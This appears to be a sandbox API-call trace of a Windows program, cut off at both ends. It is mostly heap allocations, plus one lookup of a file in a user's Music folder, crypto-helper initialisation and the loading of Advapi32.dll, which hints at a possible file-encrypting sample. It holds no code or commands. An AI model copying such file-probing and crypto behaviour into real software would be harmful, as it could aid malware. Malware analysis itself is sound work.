0x43e2130 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0109.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0109.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0109.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0109.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0109.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0109.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0109.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d10 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0109.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0109.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0109.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0109.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0109.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0109.500] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0109.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0109.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0109.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0109.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0109.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0109.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0109.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0109.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0109.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0109.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0109.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0109.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0109.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0109.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0109.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0109.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0109.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0109.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0109.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0109.502] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\2 MaJ1.m4a", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d900a30, ftCreationTime.dwHighDateTime=0x1d5e918, ftLastAccessTime.dwLowDateTime=0x2cc0f370, ftLastAccessTime.dwHighDateTime=0x1d5eac4, ftLastWriteTime.dwLowDateTime=0x2cc0f370, ftLastWriteTime.dwHighDateTime=0x1d5eac4, nFileSizeHigh=0x0, nFileSizeLow=0x6fb6, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="2 MaJ1.m4a", cAlternateFileName="2MAJ1~1.M4A")) returned 0x41ac280 [0109.503] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0109.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0109.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0109.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0109.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0109.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0109.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0109.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0109.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0109.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0109.504] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0109.504] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0109.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0109.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f20 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0109.504] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0109.504] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0109.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0109.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca028 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0109.504] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0109.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0109.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0109.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0109.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0109.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0109.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0109.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0109.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0109.505] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0109.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0109.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0109.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0109.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0109.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0109.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0109.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0109.506] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0109.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0109.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0109.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0109.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0109.506] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0109.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0109.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0109.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0109.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0109.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0109.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0109.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0109.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0109.507] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0109.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0109.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0109.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0109.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0d0 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0109.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0109.507] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0109.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0109.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0109.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0109.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0109.508] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0109.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0109.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0109.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0109.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0109.509] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca088 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0109.509] PeekMessageW (in: 